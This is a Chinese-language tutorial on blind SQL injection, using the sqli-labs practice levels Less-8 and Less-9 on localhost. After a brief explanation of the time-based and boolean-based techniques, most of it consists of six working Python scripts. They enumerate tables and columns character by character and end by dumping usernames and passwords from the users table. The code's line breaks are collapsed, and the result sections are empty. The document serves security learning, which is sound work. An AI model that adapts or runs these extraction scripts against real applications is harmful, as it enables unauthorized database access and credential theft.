时间盲注Boolen盲注之获取表、列、具体数据的函数

时间盲注

时间盲注（Time-Based Blind SQL Injection）是一种利用数据库响应时间的差异来推断数据的SQL注入技术。它的核心原理是通过构造特定的SQL查询，使得数据库在执行查询时产生时间延迟，从而根据延迟的有无来推断数据。

时间盲注的原理可以概括为：

利用数据库的时间函数（如SLEEP()）制造延迟；

通过观察延迟的有无，判断某个条件是否为真；

通过逐字符或二分法推断目标数据。

以spli-labs中less-9为例：

获取表

用二分法遍历字符位置，寻找表名

import requests
import timeurl = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
delay = 2def is_injected(payload):start = time.time()try:requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay+1)except requests.exceptions.Timeout:return Truereturn time.time() - start > delaytable = []
for pos in range(1, 30):for c in range(32, 127):payload = f"IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"if is_injected(payload):table.append(chr(c))print("".join(table))breakelse:breakprint("".join(table))

结果如下：

获取列

import requests
import timeurl = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
delay = 2
table_name = "emails"def is_injected(payload):start = time.time()try:requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)except requests.exceptions.Timeout:return Truereturn time.time() - start > delaycolumn = []
for pos in range(1, 30):for c in range(32, 127):payload = f"IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"if is_injected(payload):column.append(chr(c))print("".join(column))breakelse:breakprint(''.join(column))

结果如下：

获取详细数据

import requests
import timeurl = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
delay = 2  #
table_name = "emails"
column_name = "id"def is_injected(payload):start = time.time()try:requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)except requests.exceptions.Timeout:return Truereturn time.time() - start > delaydata = []
for pos in range(1, 50):for c in range(32, 127):payload = f"IF(ASCII(SUBSTR((SELECT {column_name} FROM {table_name} LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"if is_injected(payload):data.append(chr(c))print("".join(data))breakelse:breakprint(''.join(data))

结果如下：

Boolen盲注

布尔盲注（Boolean-Based Blind SQL Injection）是一种 SQL 注入攻击技术，用于在无法直接获取数据库数据的情况下，通过观察应用程序的布尔响应（真/假）来推断信息。

布尔盲注的特点

无直接数据返回：攻击者无法直接看到数据库的查询结果，只能通过页面的布尔响应推断信息。

逐字符猜解：需要逐个字符猜解数据，效率较低，但适用于无法直接获取数据的情况。

依赖页面响应：攻击者需要能够区分页面在条件为真和假时的不同响应。

以spli-labs中less-8为例：

获取表名

import requests
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = 'and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=' \'database()%20limit%20{t},1),{w},1))={A}%20--%20k'
list1 = [64, 94, 96, 124, 176, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 173, 175, 95, 65, 66, 67, 68, 69, 70, 71,72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103,104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 44]
str1 = "You are in..........."
str2 = bytes(str1, 'utf-8')
tables1 = ''
tables2 = ''
tables3 = ''
tables4 = ''
for i in range(0, 4):for j in range(1, 10):for s in list1:p = payload.format(t=i, w=j, A=s)u = requests.get(url+p)if str2 in u.content:if i == 0:tables1 += chr(s)print (u"正在对比第1个表,", u"第", j, u"个字符",tables1)elif i == 1:tables2 += chr(s)print (u"正在对比第2个表,", u"第", j, u"个字符", tables2)elif i == 2:tables3 += chr(s)print (u"正在对比第3个表,", u"第", j, u"个字符", tables3)elif i == 3:tables4 += chr(s)print (u"正在对比第4个表,", u"第", j, u"个字符", tables4)break
print ('tables1-->', tables1)
print ('tables2-->', tables2)
print ('tables3-->', tables3)
print ('tables4-->', tables4)

结果如下：

获取列名

import requests
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v','w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C','D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y','Z', '.']
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = '%20and%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security' \'%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--%20k'column = ['', '', '', '', '']
str1 = 'You are in...........'
str2 = bytes(str1, 'utf-8')
for j in range(0, 3):for i in range(1, 9):for l in list1:p = payload.format(w=j, n=i, c=column[j]+l)u = requests.get(url+p)if str2 in u.content:column[j] += lprint (u'正在对比第', j+1, u'个字段第', i, u'个字符', column[j])break
for c in range(0, 5):print ('column', c+1, '-->', column[c])

结果如下：

获取详细数据

import requests
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v','w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C','D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y','Z', '.']
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
str1 = 'You are in...........'
str2 = bytes(str1, 'utf-8')
username = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
password = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
for i in range(1, 15):for j in range(1, 11):for l in list1:p = payload.format(n=i, w=j, d=username[i-1]+l)u = requests.get(url+p)if str2 in u.content:username[i-1] += lprint (u'正在对比第', i, u'个记录的username的第', j, u'个字符', username[i-1])
payload2 = '%20and%20left((select%20password%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
for i in range(1, 15):for j in range(1, 11):for l in list1:p = payload2.format(n=i, w=j, d=password[i-1]+l)u = requests.get(url+p)if str2 in u.content:password[i-1] += lprint (u'正在对比第', i, u'个记录的password的第', j, u'个字符', password[i-1])
print ('id    username    password')
for i in range(1, 15):print (i, '-', username[i-1], '-', password[i-1])

结果如下：